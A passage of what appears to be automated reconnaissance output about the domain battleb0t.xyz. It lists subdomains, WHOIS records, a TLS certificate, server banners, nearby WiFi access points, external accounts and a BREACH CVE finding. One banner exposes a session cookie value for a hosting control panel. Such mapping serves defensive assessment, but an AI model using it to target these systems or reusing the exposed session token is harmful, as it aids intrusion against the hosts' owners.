"AAAA", "resolved_at": "2023-03-15T12:14:05.802464120Z"}, "eduardocesb.com.br": {"record_type": "AAAA", "resolved_at": "2023-04-12T22:02:15.081895995Z"}, "maps.worlddata.ai": {"record_type": "CNAME", "resolved_at": "2023-03-12T12:07:34.845910122Z"}, "blackmeal-prod.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-05T12:07:54.320842879Z"}, "saaze.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-18T19:28:25.471953725Z"}, "blissful-euler-74f7c7.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-15T21:01:15.208249214Z"}, "moonowl.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-28T12:07:54.194709970Z"}, "staging-mi.eprenda.com": {"record_type": "CNAME", "resolved_at": "2023-05-06T14:50:08.481369014Z"}, "admin.cuthequeue.com": {"record_type": "CNAME", "resolved_at": "2023-05-06T14:40:35.616445164Z"}, "tubular-treacle-592747.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-09T12:06:37.643789453Z"}, "dansabelli.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-16T12:05:34.070554379Z"}, "tallysg.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-25T12:08:22.921382976Z"}, "first-eet-kit.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-12T12:07:33.895379344Z"}, "ammandynamics.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-03T12:09:40.345393949Z"}, "nansite.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-18T12:08:12.063109274Z"}, "adoring-kilby-3a4082.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-18T19:28:26.626696081Z"}, "studio.stratongroup.com": {"record_type": "CNAME", "resolved_at": "2023-03-16T14:29:26.908966138Z"}, "awesome-boyd-a9b001.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-15T12:06:54.693767464Z"}, "cerulean-arithmetic-d6e551.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-19T21:38:01.801401522Z"}, "rvh-admin-dev.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-09T12:06:41.806917383Z"}, "adoring-lichterman-6e1b2c.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-07T12:05:45.918031921Z"}, "www.mindfuel.ai": {"record_type": "CNAME", "resolved_at": "2023-05-05T12:13:54.357770256Z"}, "launch-highlight-games-bet.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-13T12:08:13.063684415Z"}, "live-polls.patootie.app": {"record_type": "CNAME", "resolved_at": "2023-03-13T20:12:50.085500654Z"}, "base64-converter.amitk.co.in": {"record_type": "CNAME", "resolved_at": "2023-04-29T17:41:26.878706088Z"}, "data.goodgovgroup.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:30:47.092778393Z"}, "centurionplaza.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-11T12:07:50.969569939Z"}, "szc188.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-24T12:06:53.942231457Z"}, "moonlit-buttercream-62c2ba.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-13T12:08:10.525669289Z"}, "summit.openstack.cn": {"record_type": "CNAME", "resolved_at": "2023-03-07T12:48:19.061204208Z"}, "www.healthymind.ai": {"record_type": "AAAA", "resolved_at": "2023-04-09T12:12:49.796134609Z"}, "builditindia.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-18T19:28:24.666074639Z"}, "www.madeinjanne.com": {"record_type": "CNAME", "resolved_at": "2023-03-23T15:48:29.495707139Z"}, "www.wenyouwang.cn": {"record_type": "CNAME", "resolved_at": "2023-05-07T13:02:43.041153650Z"}, "builtwithgravio-overview.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-26T12:07:12.361137607Z"}, "asil-us-icc-task-force.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-23T12:19:22.972044404Z"}, "narutmic.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-13T20:12:34.642983581Z"}, "brave-kowalevski-585af4.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-01-29T12:06:08.901355108Z"}, "ner-attack.ashita.nl": {"record_type": "CNAME", "resolved_at": "2023 | 2600:1f18:2489:8202::c8 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | https://nwapi.battleb0t.xyz/ | nwapi.battleb0t.xyz |
| 2023-05-12 02:53:15 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 104.21.71.14 | battleb0t.xyz |
| 2023-05-12 03:13:05 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0047ol.github.io]
https://www.openphish.com/feed.txt | 0047ol.github.io |
| 2023-05-12 03:12:14 | Affiliate - Domain Whois | No | Whois | 4 | 0 | 6 | 0 | None | Domain Name: CLIENTIFY.NET
Registry Domain ID: 1866957767_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2022-09-16T17:34:41Z
Creation Date: 2014-07-15T10:59:40Z
Registry Expiry Date: 2023-07-15T10:59:40Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: 480-624-2505
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Name Server: JANET.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLIENTIFY.NET
Registry Domain ID: 1866957767_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-07-16T08:59:21Z
Creation Date: 2014-07-15T05:59:40Z
Registrar Registration Expiration Date: 2023-07-15T05:59:40Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=CLIENTIFY.NET
Registry Admin ID: Not Available From Registry
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=CLIENTIFY.NET
Registry Tech ID: Not Available From Registry
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=CLIENTIFY.NET
Name Server: JANET.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
| clientify.net |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:97:99:5c:60:ac:40:68:f8:b2:de:0a:67:7a:da:b7:d1:16
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 24 03:02:53 2023 GMT
Not After : May 25 03:02:52 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ed:bc:d0:71:75:f9:c1:51:79:49:f8:25:6c:e2:
4b:7a:05:e1:2b:6c:79:44:98:ff:b2:cc:bc:d7:da:
27:25:29:37:c7:ba:80:cb:e1:7c:b8:4d:37:a2:bc:
93:44:eb:bc:62:ff:47:cb:21:ea:3d:05:4c:04:57:
82:93:5b:a9:25:29:fb:98:33:b0:04:74:aa:bc:9a:
64:5e:c7:e2:6c:e5:ec:2a:e7:40:6b:e1:75:93:39:
b3:cf:b8:e9:11:29:e6:d1:9e:08:56:54:16:9f:c1:
1d:1f:f5:f6:ca:48:3a:94:53:03:1d:bf:52:af:6e:
27:9d:80:8d:f0:57:28:d4:f0:01:34:f4:39:59:4a:
df:9f:00:47:87:9a:39:38:c1:8f:84:8a:02:0b:b2:
6e:5c:36:a2:f6:35:e6:d2:23:6b:29:b1:15:aa:86:
a3:5b:eb:30:cc:af:b8:df:d5:0e:8f:8e:29:7e:0d:
21:28:d0:d2:4c:71:5b:19:01:9b:dc:b9:90:88:7d:
fc:5d:3e:72:44:e6:46:11:dd:e6:fd:a5:42:a3:07:
24:e7:29:d9:29:1c:f3:72:77:8b:cb:0b:df:45:34:
0b:81:a8:00:de:f0:13:74:1b:bf:2f:61:ad:65:73:
29:3e:05:b5:c3:90:28:8c:96:ef:cb:b3:06:ba:9b:
6b:f7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C4:85:82:A3:5E:ED:4D:54:E9:0D:BD:02:AC:67:B2:FA:F3:E1:58:3F
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Feb 24 04:02:53.639 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:28:F1:70:B2:E6:F5:A1:9C:C3:2A:B9:98:
B7:CA:DE:46:06:8A:0D:FD:5D:51:62:6A:9E:AF:A7:18:
F8:56:D1:B0:02:20:21:A4:D3:7B:9B:94:A5:33:57:25:
EA:F9:E9:6B:7D:DB:3E:9B:70:AC:99:47:BB:60:A1:D8:
D4:9F:E0:9F:F4:44
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Feb 24 04:02:53.699 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:3D:E9:FF:70:A3:4B:24:45:DE:32:CD:C1:
EB:D6:68:50:E8:90:39:17:70:65:2F:C3:8E:27:EF:8F:
0A:2C:12:42:02:20:63:BD:B7:88:53:11:AE:74:C0:8C:
3E:DD:9A:2F:D6:E5:34:A4:8C:A2:AB:43:8C:64:7E:9B:
D2:8E:90:08:CE:60
Signature Algorithm: sha256WithRSAEncryption
7e:31:5b:b5:c6:0c:16:27:0b:f5:1a:b3:80:a7:ef:5e:5f:1b:
87:38:b7:8a:be:5c:4b:2a:3f:28:2b:4f:87:5f:c2:b4:d3:b7:
be:f8:28:f5:15:c7:b3:3f:3d:40:b4:03:a4:95:06:01:1a:58:
1f:75:36:4b:ec:65:5a:e0:fd:b0:bf:41:e3:ff:57:4e:dd:05:
47:2c:e5:74:c8:5a:58:19:d6:53:61:f6:8d:0e:19:29:5d:dd:
b2:13:e8:c5:4c:7e:68:dc:f2:b4:05:5a:13:8e:d2:2e:4e:5e:
81:10:a5:86:8f:30:30:f7:61:4a:6f:5c:17:0d:a4:ef:13:02:
05:48:b0:18:ac:9c:df:24:70:12:e3:44:ac:31:54:f5:b6:92:
f4:ec:b6:e7:16:93:23:c7:b8:7e:51:5c:f7:05:33:1c:0e:7a:
b3:3d:ed:21:03:d2:bc:a5:bf:10:81:1f:4c:79:d4:3a:73:b9:
93:9f:57:8b:98:ea:3e:74:39:70:99:3d:3a:c0:f2:4d:e1:55:
ed:dc:49:4e:a6:39:a5:82:ea:2d:6e:e9:17:c6:72:75:ec:10:
72:d0:c9:3e:b9:30:69:bc:2f:70:06:3c:ba:31:b6:c1:0c:45:
e6:92:88:78:56:3a:d4:0c:d2:32:b8:49:37:f3:c4:6d:15:69:
54:99:0a:d9
| battleb0t.xyz |
| 2023-05-12 02:55:05 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5913389a552a51-ORD
Content-Encoding: gzip
| 188.114.97.1 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Venmo (Category: finance)
https://account.venmo.com/u/login | login |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Airwolf (Net ID: 00:13:46:15:C7:AA) | 50.8897, 6.0563 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLGNet (Net ID: 00:01:36:26:BA:44) | 34.0544, -118.244 |
| 2023-05-12 03:00:56 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.87): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:21 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.108.153 |
| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5853301ea41251-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.168.252 |
| 2023-05-12 02:45:35 | Affiliate - Internet Name | No | DNS Raw Records | 1 | 0 | 2 | 0 | None | battleb0t.github.io | www.battleb0t.xyz |
| 2023-05-12 03:01:18 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.161): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 3 | 0 | None | GitHub\, Inc. | C=US,ST=California,L=San Francisco,O=GitHub\, Inc.,CN=*.github.io |
| 2023-05-12 03:08:50 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.126 | 35.229.48.116 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | draadjelos54 (Net ID: 00:01:E3:04:A3:37) | 52.3759, 4.8975 |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Pronouns.Page (Category: social)
https://pronouns.page/api/profile/get/Battleb0t?version=2 | Battleb0t |
| 2023-05-12 02:54:30 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | openssh | 64.226.81.43 |
| 2023-05-12 02:54:00 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5ccedd4dfe2bc6-FRA
Content-Encoding: gzip
| 104.21.6.166 |
| 2023-05-12 03:23:33 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.12:80 | 188.114.96.0/24 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset="utf-8"
Date: <REDACTED>
Cache-Control: no-cache, no-store, must-revalidate, private
Pragma: no-cache
Set-Cookie: whostmgrrelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure
Set-Cookie: whostmgrsession=%3a8HJb2gy62wgW5AEl%2cc019e95b194ab8d9598010e513f0ec9b; HttpOnly; path=/; port=2087; secure
Set-Cookie: roundcube_sessid=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure
Set-Cookie: roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure
Set-Cookie: Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure
Set-Cookie: horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure
Set-Cookie: Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure
Set-Cookie: Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2087; secure
Set-Cookie: PPA_ID=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure
Set-Cookie: imp_key=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure
Set-Cookie: Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087
Set-Cookie: horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087
Cache-Control: no-cache, no-store, must-revalidate, private
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Content-Length: 12408
| 87.248.157.102 |
| 2023-05-12 02:46:25 | Netblock Membership | No | RIPE | 2 | 0 | 2 | 0 | None | 104.21.0.0/20 | 104.21.6.166 |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.48): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:07:57 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | 185.199.108.153 |
| 2023-05-12 02:44:47 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 3 | 0 | None | Cloudflare | panel.battleb0t.xyz |
| 2023-05-12 02:54:30 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | Debian Linux 10.2 | 64.226.81.43 |
| 2023-05-12 02:45:56 | Physical Location | No | AbstractAPI | 0 | 0 | 4 | 0 | None | Ashburn, Virginia, 20149, United States, North America | 2600:1f18:2489:8201::c8 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wireless (Net ID: 00:01:36:0F:6E:91) | 52.3759, 4.8975 |
| 2023-05-12 03:00:23 | Blacklisted IP Address | Yes | Honeypot Checker | 0 | 1 | 2 | 0 | None | Honeypotproject (188.114.96.1): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.1 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | adm734qwe (Net ID: 00:0D:3A:2C:01:71) | 39.0469, -77.4903 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SpeedStream (Net ID: 00:01:24:F0:B4:05) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SpeedStream (Net ID: 00:01:24:F0:DA:C3) | 37.7642, -122.3993 |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 5 | 0 | 2 | 0 | None | +14805058800 | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
